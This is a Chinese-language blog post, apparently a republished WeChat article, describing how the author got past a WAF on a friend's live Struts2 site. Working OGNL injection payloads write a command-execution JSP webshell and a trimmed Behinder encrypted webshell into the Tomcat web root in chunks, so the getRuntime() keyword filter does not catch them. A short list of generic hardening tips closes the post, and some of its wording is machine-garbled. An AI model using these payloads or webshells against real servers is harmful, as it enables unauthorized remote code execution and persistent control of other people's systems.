jsp跳过struts拦截绕过Struts2 waf写入冰蝎以及惯例防备方法

继之前的Struts2绕过waf读写文件之后，碰着了一个实例，分享一下思路。

0x01 背景

朋友发来一个struts2有waf的站点，能检测到漏洞，但是命令实行不了，上传shell肯定也就弗成了，估计是检测了关键字，直接开干

0x02 写命令实行马

一开始的思路是访问站点的jsp文件，比如http://xx.xxx/123.jsp测试有没有全局拦截，很显然，这里是没有的

jsp跳过struts拦截绕过Struts2 waf写入冰蝎以及惯例防备方法 React

直接可以进行写shell，先找绝对路径

0x001 查看web目录

这里web目录是/usr/local/tomcat/webapps/ROOT/，直接写个文件到/usr/local/tomcat/webapps/ROOT/3.jsp

0x002 创建文件

0x003 写文件

这里写文件碰着了困难，缘故原由在于涌现了关键字getRuntime()，但是是可以绕过的，分批次进行写入文件，本地进行测试如下

package Struts2bypasswaf; import java.io.BufferedWriter; import java.io.IOException; / @author f0ng @date 2022/5/24 /public class teststruts2 { public static void main(String[] args) throws IOException { BufferedWriter aaa = new java.io.BufferedWriter(new java.io.FileWriter("1.txt",true)); aaa.append("\""); aaa.flush(); aaa.close(); } }

原始文件如下

实行Java代码后

可以创造双引号被追加写入了(这里为什么拎出来双引号，由于须要转义)

写文件分段1

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp",true)),#bb0.append("<% java.io.InputStream in = Runtime.getRun"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}

写文件分段2

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp",true)),#bb0.append("time().exec(request.getParameter(\"pass\")).getInputStream();int a = -1;byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));} %>"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}

0x004 实行命令

访问webshell即可

0x03 写入冰蝎马

这时候朋友又说了，这个webshell不可操作，他不喜好

那么仿造之前的方法写个冰蝎给他不就行了，前面都是一样的，给出数据包

创建文件:

写入文件:

内容是

<%@page import="java.util.,javax.crypto.,javax.crypto.spec."%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/43.jsp",true)),#bb0.append("<%@page import=\"java.util.,javax.crypto.,javax.crypto.spec.\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}

后面再写就创造出问题了，怎么都写不进去，但是一个一个字符是可以的，那么就可以单个字符进行追加写入；但是又碰着了一个问题，单个字符的{和}写不进去，缘故原由暂不清楚，以是直接阉割了冰蝎马，后面为:

<% String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

去除了if (request.getMethod().equals("POST")){}把稳要将%改为%25，要将"改为\""，转义

连接成功

0x04 总结对付通过http去写入分外字符，要考虑URL编码以及转义的问题，如%变成了%25，"变成了\";利用到实战之前现在本地环境进行复现是很有必要的;文件落地比较麻烦，如果可以注入内存马那是比较方便的。
0x05 参考

https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ 【struts2绕过waf读写文件及另类办法实行命令】

https://github.com/vulhub/vulhub/tree/master/struts2/s2-016 【Struts2 016环境】

from https://mp.weixin.qq.com/s/31nUrF1v50-J2v6IOYzNYA

Struts2 是一个广泛利用的 Web 运用程序框架，但是由于其繁芜的构造和高度可配置性，也存在一些安全风险，攻击者可以利用这些漏洞进行远程代码实行、文件读取等攻击。
一些站点为了防御这些攻击，会利用 Web 运用程序防火墙（WAF）来进行防御。
但是，WAF 并不能完备办理所有的安全问题，以下是一些建议：

及时更新 Struts2 版本，确保漏洞得到及时修复。
对用户输入的数据进行严格的校验和过滤，避免通过用户输入的数据布局恶意要求。
启用安全的开拓实践，如利用安全的密码存储和传输方案、利用 CSRF token 戒备 CSRF 攻击等。
配置精确的权限掌握策略，限定用户访问敏感资源的权限。
将运用程序支配在安全的环境中，如安全的操作系统、数据库等，避免由于操作系统或数据库的漏洞导致运用程序受到攻击。
对系统日志进行监控，及时创造和相应非常要乞降攻击行为。
不要过分依赖 WAF，WAF 可以起到一定的防御浸染，但并不能完备担保系统的安全，因此须要进行综合的安全风险评估和戒备方法。

须要把稳的是，以上建议只是一些基本的戒备方法，对付特定的运用处景和攻击办法，可能须要针对性的戒备方法。
因此，在开拓和支配运用程序时，还须要根据详细情形综合考虑各种安全风险，并采纳相应的戒备方法。